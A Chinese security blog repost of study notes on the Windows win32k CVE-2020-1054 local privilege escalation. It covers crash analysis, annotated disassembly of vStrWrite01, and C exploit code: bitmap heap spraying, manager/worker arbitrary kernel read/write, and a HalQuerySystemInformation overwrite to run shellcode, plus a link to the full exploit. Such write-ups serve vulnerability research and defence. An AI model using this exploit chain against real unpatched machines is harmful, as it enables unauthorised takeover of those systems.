CVE-2020-1054提权漏洞学习笔记

admin 2022年9月20日20:53:22安全文章评论3 views9479字阅读31分35秒阅读模式

CVE-2020-1054提权漏洞学习笔记

本文为看雪论坛优秀文章

看雪论坛作者ID:1900





前言


1.漏洞描述


该漏洞存在于win32k!vStrWrite01函数中,该函数在对BitMap对象中pvScan0成员所指向的像素区域进行读写的时候,没有判断读写的地址是否已经越界,即超过了BitMap对象的像素点范围,导致BSOD的产生。通过合理的内存布局,可以利用该漏洞扩大目标BitMap对象的sizlBitmap来扩大该BitMap对象的可读写范围,利用此时被扩大读写范围的BitMap对象来修改另一个BitMap对象的pvScan0就可以实现任意地址读写。

2.实验环境


  • 操作系统:Win7 x64 7601 专业版
  • 编译器:Visual Studio 2017
  • 调试器:IDA Pro, WinDbg





漏洞分析


1.POC代码分析


该漏洞的POC代码如下:
VOID POC_CVE_2020_1054(){    LoadLibrary("user32.dll");    HDC r0 = CreateCompatibleDC(0x0);    // CPR's original crash code called CreateCompatibleBitmap as follows    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);    // however all following calculations/reversing in this blog will    // generally use the below call, unless stated otherwise    // this only matters if you happen to be following along with WinDbg    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);    SelectObject(r0, r1);    DrawIconEx(r0, 0x0, 0x0, (HICON)0x30000010003, 0x0, 0xfffffffffebffffc,                0x0, 0x0, 0x6);}

POC代码通过CreateComatibleBitmap对象来创建了一个BitMap对象用来触发漏洞,该函数定义如下:
HBITMAP CreateCompatibleBitmap(HDC hdc,                     int nWidth,                         int nHeight);

漏洞触发函数则是DrawIconEx,该函数用于在指定的设备上下文中绘制图像,该函数定义如下:
BOOL WINAPI DrawIconEx(HDC hdc,                   int xLeft,                int yTop,                   HICON hIcon,                   int cxWidth,                       int cyWidth,                       UINT istepIfAniCur,                       HBRUSH hbrFlickerFreeDraw,                       UINT diFlags);

编译运行POC,系统就会产生BSOD错误,以下的部分错误信息:
0: kd> !analyze -vConnected to Windows 7 7601 x64 target at (Tue Jul 12 10:00:11.147 2022 (UTC + 8:00)), ptr64 TRUE********************************************************************************                                                                             **                        Bugcheck Analysis                                    **                                                                             ********************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)Invalid system memory was referenced. This cannot be protected by try-except.Typically the address is just plain bad or it is pointing at freed memory.Arguments:Arg1: fffff906c5000238, memory referenced.Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.Arg3: fffff9600011218a, If non-zero, the instruction address which referenced the bad memory address.Arg4: 0000000000000005, (reserved)
Debugging Details:------------------
IMAGE_NAME: win32k.sys
TRAP_FRAME: fffff88005386a40 -- (.trap 0xfffff88005386a40)NOTE: The trap frame does not contain all registers.Some register values may be zeroed or incorrect.rax=fffff900c5000000 rbx=0000000000000000 rcx=fffff906c5000238rdx=fffff900c06f7fa0 rsi=0000000000000000 rdi=0000000000000000rip=fffff9600011218a rsp=fffff88005386bd0 rbp=0000000000000000 r8=0000000000000020 r9=fffff96000070000 r10=fffff88005386c30r11=0000000000000000 r12=0000000000000000 r13=0000000000000000r14=0000000000000000 r15=0000000000000000iopl=0 nv up ei ng nz na po cywin32k!vStrWrite01+0x36a:fffff960`0011218a 418b36 mov esi,dword ptr [r14] ds:00000000`00000000=????????
STACK_TEXT: nt!RtlpBreakWithStatusInstructionnt!KiBugCheckDebugBreak+0x12nt!KeBugCheck2+0x71ent!KeBugCheckEx+0x104nt! ?? ::FNODOBFM::`string'+0x44891nt!KiPageFault+0x16ewin32k!vStrWrite01+0x36awin32k!EngStretchBltNew+0x164awin32k!EngStretchBlt+0x797win32k!EngStretchBltROP+0x5fewin32k!BLTRECORD::bStretch+0x623win32k!GreStretchBltInternal+0xa37win32k!BltIcon+0x18fwin32k!DrawIconEx+0x3b1win32k!NtUserDrawIconEx+0x14dnt!KiSystemServiceCopyEnd+0x13USER32!NtUserDrawIconEx+0xaUSER32!DrawIconEx+0xd9

根据错误信息可以知道,产生BSOD错误的代码地址位于win32k!vStrWrite01偏移0x36A处,产生原因是对不合法的地址,即0地址进行读取操作。

2.vStrWrite01函数分析


在NT4源码中可以找到vStrWrite01函数的定义如下:
VOID vStrWrite01(STRRUN  *prun,                  XRUNLEN *pxrlEnd,                 SURFACE *pSurf,                 CLIPOBJ *pco)

其中,与漏洞相关的前三个参数定义如下:
typedef struct _XRUNLEN{    LONG    xPos;    LONG    cRun;    LONG    aul[1];} XRUNLEN;
typedef struct _STRRUN{ LONG yPos; LONG cRep; XRUNLEN xrl;} STRRUN;

typedef struct tagSIZE { LONG cx; LONG cy;} SIZE,*PSIZE,*LPSIZE;
typedef SIZE SIZEL;
typedef struct _BASEOBJECT64{ ULONG64 hHmgr; // 0x00 ULONG32 ulShareCount; // 0x08 WORD cExclusiveLock; // 0x0A WORD BaseFlags; // 0x0C ULONG64 Tid; // 0x10} BASEOBJECT64;
typedef struct _SURFOBJ64{ BASEOBJECT64 baseObj; // 0x00 ULONG64 dhsurf; // 0x18 ULONG64 hsurf; // 0x20 ULONG64 dhpdev; // 0x28 ULONG64 hdev; // 0x30 SIZEL sizlBitmap; // 0x38 ULONG64 cjBits; // 0x40 ULONG64 pvBits; // 0x48 ULONG64 pvScan0; // 0x50 ULONG32 lDelta; // 0x58 ULONG32 iUniq; // 0x5C ULONG32 iBitmapFormat; // 0x60 USHORT iType; // 0x64 USHORT fjBitmap; // 0x66} SURFOBJ64;

根据WinDbg的错误信息可以在IDA中定位到触发错误的代码,在触发错误的代码上面不远处就可以看到,读取的内存地址由rcx与rax决定,所以就需要分析rcx与rax的计算才能知道读取的内存地址。
CVE-2020-1054提权漏洞学习笔记
在vStrWrite01函数首先对参数进行赋值,并判断相关参数是否条件,这里的三个跳转都不会进行:
.text:FFFFF97FFF0A5118 ; void __fastcall vStrWrite01(struct _STRRUN *prun, struct _XRUNLEN *pxrlEnd, struct SURFACE *pSurf, struct _CLIPOBJ *pco).text:FFFFF97FFF0A5118 [email protected]@[email protected]@[email protected]@[email protected]@[email protected]@@Z proc near.text:FFFFF97FFF0A5118                 test    rdx, rdx       ; 判断pxrlEnd是否为NULL.text:FFFFF97FFF0A511B                 jz      locret_FFFFF97FFF0A560E.text:FFFFF97FFF0A5143                 lea     rax, [rcx+8]    ; eax = prun->xrl.text:FFFFF97FFF0A5147                 mov     rbx, r9         ; rbx = pco.text:FFFFF97FFF0A514A                 mov     r15, r8         ; r15 = pSurf.text:FFFFF97FFF0A5152                 mov     rdi, rax        ; rdi = prun->xrl.text:FFFFF97FFF0A515A                 mov     rsi, rcx        ; rsi = prun.text:FFFFF97FFF0A515D                 test    rbx, rbx        ; poc是否为NULL.text:FFFFF97FFF0A5160                 jnz     loc_FFFFF97FFF0A53AC.text:FFFFF97FFF0A53C7                 mov     ebp, [rsi]      ; ebp = prun->yPos.text:FFFFF97FFF0A53DE                 mov     r11d, [rsi+4]   ; r11d = prun->xrl->cRun.text:FFFFF97FFF0A53FA                 mov     eax, [r15+58h]  ; eax = pSurf->lDelta.text:FFFFF97FFF0A53FE                 imul    eax, ebp        ; eax = pSurf->lDelta * prun->yPos.text:FFFFF97FFF0A5401                 movsxd  rcx, eax        ; rcx = pSurf->lDelta * prun->yPos.text:FFFFF97FFF0A5404                 add     rcx, [r15+50h]  ; rcx = pSurf->lDelta * prun->yPos + pSurf->pvScan0.text:FFFFF97FFF0A5408                 mov     [rsp+0A8h+var_rcx], rcx ; 保存rcx的数值.text:FFFFF97FFF0A540D                 test    r11d, r11d      ; 判断prun->yPos是否为0.text:FFFFF97FFF0A5410                 jz      loc_FFFFF97FFF0A55F7

将r11d减一,也就是将保持的prun->xrl->cRun减一,之后就开始计算rcx和rax,在用rcx和rax来计算r14,即计算之后要读取的内存地址:
.text:FFFFF97FFF0A541D                 mov     r12d, 1.text:FFFFF97FFF0A5423 loc_FFFFF97FFF0A5423:                   .text:FFFFF97FFF0A5423                 sub     r11d, r12d      ; r11d = r11d - 1.text:FFFFF97FFF0A5450                 movsxd  rbx, dword ptr [rdi] ; rbx = prun->xrl->xPos.text:FFFFF97FFF0A545A                 mov     rax, rbx        ; rax = prun->xrl->xPos.text:FFFFF97FFF0A5460                 sar     rax, 5          ; rax = prun->xrl->xPos >> 5.text:FFFFF97FFF0A546D                 lea     r14, [rcx+rax*4]

接下去执行就是导致BSOD错误产生的mov esi, [r14]这条指令。如果r14中保持地址是合法的地址,之后就会对读取到的值进行or运算或者and运算:
CVE-2020-1054提权漏洞学习笔记
把运算以后得到的值在赋值回r14指向的内存地址:
.text:FFFFF97FFF0A5579                 mov     [r14], esi

对rcx进行增加,在判断r11d是否为0,如果不为0就会跳转到loc_FFFFF97FFF0A5423,也就是跳转到上面的sub r11d, r12d指令开始,再次执行上述的这些指令:
.text:FFFFF97FFF0A5580                 mov     rcx, [rsp+0A8h+var_rcx]  ; 将之前保存的rcx赋值给rcx.text:FFFFF97FFF0A55B7                 movsxd  rax, dword ptr [r15+58h] ; rax = pSurf->lDelta.text:FFFFF97FFF0A55BE                 add     rcx, rax        ; rcx = rcx + pSurf->lDelta.text:FFFFF97FFF0A55EE                 test    r11d, r11d.text:FFFFF97FFF0A55F1                 jnz     loc_FFFFF97FFF0A5423

根据上面分析,可以得出要读写的内存地址,即r14寄存器的值的计算可以用以下循环来计算:
for (i = 0; i < prun->yPos; i++){    r14 = pSurf->lDelta * prun->yPos + pSurf->pvScan0 + (prun->xrl->xPos >> 5) * 4 + i * pSurf->lDelta    // 对r14指向的内存地址进行读写}



漏洞利用


漏洞利用的步骤如下:

① 创建用来触发漏洞的BitMap对象hExpBitMap。

② 在hExpBitMap偏移0x100070000处放置一个BitMap对象,作为hManager。

③ 在hManager之后偏移0x7000地址处分配一个BitMap对象作为hWorker。

④ 触发漏洞,扩大hManager所对应的BitMap对象的sizelBitmap来扩大hManager的可读写范围。

⑤ 通过hManager修改hWorker对应的BitMap对象的pvScan0,就可以实现任意地址读写实现提权。


为了成功创建用于利用的hManager和hWorker,需要通过喷射大量0x7000大小的BitMap对象,相应的代码如下:
BOOL Exploit_CVE_2020_1054(){    BOOL bRet = TRUE;
if (!LoadLibrary("user32.dll")) { bRet = FALSE; ShowError("LoadLibrary", GetLastError()); goto exit; }
HDC hdc = NULL; hdc = CreateCompatibleDC(NULL); if (!hdc) { bRet = FALSE; ShowError("CreateCompatibleDC", GetLastError()); goto exit; }
HBITMAP hExpBitMap = NULL;
hExpBitMap = CreateCompatibleBitmap(hdc, 0x51500, 0x100); if (!hExpBitMap) { bRet = FALSE; ShowError("CreateCompatibleBitmap", GetLastError()); goto exit; }
ULONG64 ulExpBitMap = GetBitMapKerAddr(hExpBitMap); ULONG64 oob_target = (ulExpBitMap & 0xfffffffffff00000) + 0x0000000100000000;
HBITMAP hManager = NULL, hWorker = NULL; ULONG64 ulManager = 0, ulWorker = 0;
while (true) { HBITMAP hBitMap = NULL;
hBitMap = CreateCompatibleBitmap(hdc, 0x6F000, 0x8); if (!hBitMap) { bRet = FALSE; ShowError("CreateCompatibleBitmap", GetLastError()); goto exit; }
ULONG64 ulBitMapKerAddr = GetBitMapKerAddr(hBitMap);
if (hManager) { ulWorker = ulBitMapKerAddr; hWorker = hBitMap; break; } else if (ulBitMapKerAddr >= oob_target && (ulBitMapKerAddr & 0x0000000000070000) == 0x70000) { ulManager = ulBitMapKerAddr; hManager = hBitMap; } }
// 触发漏洞,修改hManger的可读写范围 SelectObject(hdc, hExpBitMap); DrawIconEx(hdc, 0x900, 0xb, (HICON)0x40000010003, 0x0, 0xffe00000, 0x0, 0x0, 0x1);exit: return bRet;}

编译运行程序,在触发漏洞之前,hManager对应的BitMap对象的sizlBitmap的值如下:
CVE-2020-1054提权漏洞学习笔记
触发漏洞之后,就可以看到可读写的范围被成功的扩大:
CVE-2020-1054提权漏洞学习笔记





运行结果


成功扩大hManager的读写范围之后,就可以通过修改hWorker的pvScan0来实现任意地址读写,最终实现提权,相应代码如下:
BOOL EnablePrivilege_CVE_2020_1054(HBITMAP hManager, HBITMAP hWorker, ULONG64 ulSize){    BOOL bRet = TRUE;    PVOID pBuf = NULL;
pBuf = malloc(ulSize + 0x10); if (!pBuf) { bRet = FALSE; ShowError("malloc", GetLastError()); goto exit; } ZeroMemory(pBuf, ulSize + 0x10);
if (!GetBitmapBits(hManager, ulSize, pBuf)) { bRet = FALSE; ShowError("GetBitmapBits", GetLastError()); goto exit; }
ULONG64 ulHalQuerySystenInformation = (ULONG64)GetHalQuerySystemInformation(); if (!ulHalQuerySystenInformation) { bRet = FALSE; goto exit; }
*(PULONG64)((ULONG64)pBuf + ulSize) = ulHalQuerySystenInformation; if (!SetBitmapBits(hManager, ulSize + sizeof(ULONG64), pBuf)) { bRet = FALSE; ShowError("SetBitmapBits", GetLastError()); goto exit; }
ULONG64 ulOrg = 0;
if (!GetBitmapBits(hWorker, sizeof(ULONG64), &ulOrg)) { bRet = FALSE; ShowError("GetBitmapBits", GetLastError()); goto exit; }
ULONG64 ulShellCode = (ULONG64)ShellCodeInWin7; if (!SetBitmapBits(hWorker, sizeof(ULONG64), &ulShellCode)) { bRet = FALSE; ShowError("GetBitmapBits", GetLastError()); goto exit; }
if (!CallNtQueryIntervalProfile()) { bRet = FALSE; goto exit; }
if (!SetBitmapBits(hWorker, sizeof(ULONG64), &ulOrg)) { bRet = FALSE; ShowError("GetBitmapBits", GetLastError()); goto exit; }
exit: return bRet;}

完成代码保存在:https://github.com/LegendSaber/exp_x64/blob/master/exp_x64/CVE-2020-1054.cpp。运行程序,即可成功提权:
CVE-2020-1054提权漏洞学习笔记


参考资料

https://bbs.pediy.com/thread-260884.htm

https://www.anquanke.com/post/id/209329

https://www.cnblogs.com/DreamoneOnly/p/13207943.html




CVE-2020-1054提权漏洞学习笔记


看雪ID:1900

https://bbs.pediy.com/user-home-835440.htm

*本文由看雪论坛 1900 原创,转载请注明来自看雪社区

CVE-2020-1054提权漏洞学习笔记



# 往期推荐

1.因优化而导致的溢出与CVE-2020-16040

2.LLVM PASS PWN 总结

3.win10 1909逆向之APIC中断和实验

4.EMET下EAF机制分析以及模拟实现

5.sql注入学习分享

6.V8 Array.prototype.concat函数出现过的issues和他们的POC们



CVE-2020-1054提权漏洞学习笔记



CVE-2020-1054提权漏洞学习笔记

球分享

CVE-2020-1054提权漏洞学习笔记

球点赞

CVE-2020-1054提权漏洞学习笔记

球在看



CVE-2020-1054提权漏洞学习笔记

点击“阅读原文”,了解更多!

原文始发于微信公众号(看雪学苑):CVE-2020-1054提权漏洞学习笔记

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月20日20:53:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2020-1054提权漏洞学习笔记 http://cn-sec.com/archives/1308081.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: